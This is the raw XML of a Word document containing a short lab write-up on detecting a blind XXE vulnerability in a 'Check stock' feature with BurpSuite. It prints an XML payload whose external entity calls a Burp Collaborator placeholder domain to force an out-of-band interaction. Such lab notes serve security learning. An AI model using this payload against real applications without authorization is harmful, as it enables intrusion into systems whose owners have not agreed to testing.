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3C845C97" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="002D4948" w:rsidP="005E4E23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is vulnerable to XXE out of band interaction as it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4948">
        <w:t>has a "Check stock" feature that parses XML input but does not display the result</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE0A2A">
        <w:t xml:space="preserve"> We will try to </w:t>
      </w:r>
      <w:r w:rsidR="00CE0A2A" w:rsidRPr="00CE0A2A">
        <w:t>detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.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a Check Stock request and intercept the POST request in BurpSuite’s Proxy tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553ADDA" w14:textId="3222284E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Replace the XML body of the request in BurpSuite’s Repeater with the Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57781895" w14:textId="24A79C50" w:rsidR="00C36F78" w:rsidRPr="00E1363A" w:rsidRDefault="00C36F7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click Poll Now in the BurpSuite’s Collaborator Client and we see that we successfully </w:t>
      </w:r>
      <w:r w:rsidR="00DC6F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">forced the application to make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an out of band </w:t>
      </w:r>
      <w:r w:rsidR="003D6F3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interaction.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33821487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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A44A7" w14:textId="6BEC692E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&lt;!DOCTYPE stockCheck [ &lt;!ENTITY xxe SYSTEM "</w:t>
      </w:r>
      <w:r w:rsidR="00C36F78" w:rsidRPr="00C36F78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://BURP-COLLABORATOR-SUBDOMAIN</w:t>
      </w:r>
      <w:r w:rsidRPr="004F232A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42088AB1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&lt;stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD81D7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   &lt;productId&gt;&amp;xxe;&lt;/productId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2AF144" w14:textId="77777777" w:rsidR="004F232A" w:rsidRPr="004F232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 xml:space="preserve">    &lt;storeId&gt;1&lt;/storeId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012FEF3" w14:textId="2376A794" w:rsidR="00595F51" w:rsidRPr="00C6154A" w:rsidRDefault="004F232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32A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCAABD" w14:textId="77777777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CCF8D0" w14:textId="23C2F7E0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282C8CBB" w14:textId="77777777" w:rsidR="00595F51" w:rsidRPr="009F1CCE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595F51" w:rsidRPr="009F1CCE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50FA0"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00E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24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T04:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-03T05:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>